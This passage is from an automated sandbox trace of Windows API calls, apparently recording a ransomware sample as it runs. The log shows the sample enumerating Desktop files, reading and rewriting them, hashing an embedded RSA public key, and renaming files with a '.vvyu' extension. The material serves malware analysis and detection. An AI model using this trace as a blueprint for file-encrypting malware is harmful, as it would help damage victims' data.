[0195.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0195.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2d08 [0195.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0195.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0195.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0195.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2cd8 [0195.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0195.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2d68 [0195.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0195.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0195.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0195.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d38 [0195.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0195.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d20 [0195.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0195.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2d80 [0195.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d20 | out: hHeap=0x620000) returned 1 [0195.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2d20 [0195.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d38 | out: hHeap=0x620000) returned 1 [0195.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0195.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0195.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0195.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0195.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83b60 [0195.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cf0 | out: hHeap=0x620000) returned 1 [0195.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2cf0 [0195.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0195.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0195.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d50 | out: hHeap=0x620000) returned 1 [0195.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0195.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d80 | out: hHeap=0x620000) returned 1 [0195.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea4a68 [0195.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0195.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99d28 [0195.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0195.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0195.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cf0 | out: hHeap=0x620000) returned 1 [0195.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea4c80 [0195.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0195.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0195.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0195.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0195.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0195.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0195.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0195.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0195.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4a68 | out: hHeap=0x620000) returned 1 [0195.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4c80 | out: hHeap=0x620000) returned 1 [0195.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0195.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0195.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d20 | out: hHeap=0x620000) returned 1 [0195.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0195.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d68 | out: hHeap=0x620000) returned 1 [0195.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0195.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d08 | out: hHeap=0x620000) returned 1 [0195.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cd8 | out: hHeap=0x620000) returned 1 [0195.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0195.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9680 | out: hHeap=0x620000) returned 1 [0195.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0195.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cc0 | out: hHeap=0x620000) returned 1 [0195.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddea0 | out: hHeap=0x620000) returned 1 [0195.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0195.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0195.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaf50 | out: hHeap=0x620000) returned 1 [0195.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0195.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0195.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0195.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0195.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0195.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0195.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0195.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0195.675] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x132e8, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x132e8, lpOverlapped=0x0) returned 1 [0195.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0195.677] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x132ed, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.677] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0195.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0195.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea4a68 [0195.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea4a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0195.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea4e98 [0195.678] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4a68 | out: hHeap=0x620000) returned 1 [0195.678] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.678] WriteFile (in: hFile=0x568, lpBuffer=0x2ea4e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea4e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0195.678] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4e98 | out: hHeap=0x620000) returned 1 [0195.678] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0195.678] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0195.679] CloseHandle (hObject=0x568) returned 1 [0195.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0195.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x2ea4a68 [0195.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0195.681] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\bQ6SJi8RO0rg0dP\\3YgFUJ.rtf" (normalized: "c:\\users\\keecfmwgj\\desktop\\bq6sji8ro0rg0dp\\3ygfuj.rtf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\bQ6SJi8RO0rg0dP\\3YgFUJ.rtf.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\bq6sji8ro0rg0dp\\3ygfuj.rtf.vvyu")) returned 1 [0195.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4a68 | out: hHeap=0x620000) returned 1 [0195.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0195.685] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.688] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0195.688] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0879660, ftCreationTime.dwHighDateTime=0x1d89783, ftLastAccessTime.dwLowDateTime=0x5980510, ftLastAccessTime.dwHighDateTime=0x1d89e2f, ftLastWriteTime.dwLowDateTime=0x5980510, ftLastWriteTime.dwHighDateTime=0x1d89e2f, nFileSizeHigh=0x0, nFileSizeLow=0x12a30, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3YsVCZXV.bmp", cAlternateFileName="")) returned 1 [0195.688] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.688] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x2e915e0 [0195.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.689] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\bQ6SJi8RO0rg0dP\\3YsVCZXV.bmp") returned=".bmp" [0195.689] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\bQ6SJi8RO0rg0dP\\3YsVCZXV.bmp" (normalized: "c:\\users\\keecfmwgj\\desktop\\bq6sji8ro0rg0dp\\3ysvczxv.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0195.689] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=76336) returned 1 [0195.689] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0195.692] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x12a0a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.692] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0195.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0195.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0195.695] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.695] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x12a30, lpOverlapped=0x0) returned 1 [0195.696] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0195.696] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.696] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.696] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0195.697] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0195.697] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0195.697] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0195.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0195.697] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0195.697] GetLastError () returned 0x0 [0195.697] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0195.697] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0195.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0195.698] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0195.698] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0195.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0195.698] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0195.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0195.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0195.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x12a30) returned 0x2ea79b0 [0195.699] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0195.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0195.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0195.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0195.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0195.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0195.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddea0 [0195.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2cc0 [0195.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdddc8 [0195.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2cd8 [0195.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d08 [0195.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d68 [0195.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d20 [0195.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0195.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0195.700] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0195.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0195.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d08 | out: hHeap=0x620000) returned 1 [0195.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d20 | out: hHeap=0x620000) returned 1 [0195.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d68 | out: hHeap=0x620000) returned 1 [0195.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0195.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0195.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d68 [0195.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0195.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2d20 [0195.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0195.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2d08 [0195.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0195.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99af8 [0195.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0195.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0195.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0195.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99d28 [0195.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0195.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0195.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0195.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d20 | out: hHeap=0x620000) returned 1 [0195.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0195.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d08 | out: hHeap=0x620000) returned 1 [0195.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0195.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0195.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d68 | out: hHeap=0x620000) returned 1 [0195.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0195.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0195.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0195.702] GetCurrentThreadId () returned 0x66c [0195.702] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0195.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea4a80 [0195.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9680 [0195.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0195.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0195.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0195.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0195.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0195.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.703] GetCurrentThreadId () returned 0x66c [0195.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0195.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0195.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0195.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0195.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaf50 [0195.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0195.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0195.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0195.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d68 [0195.705] HeapFree (in: 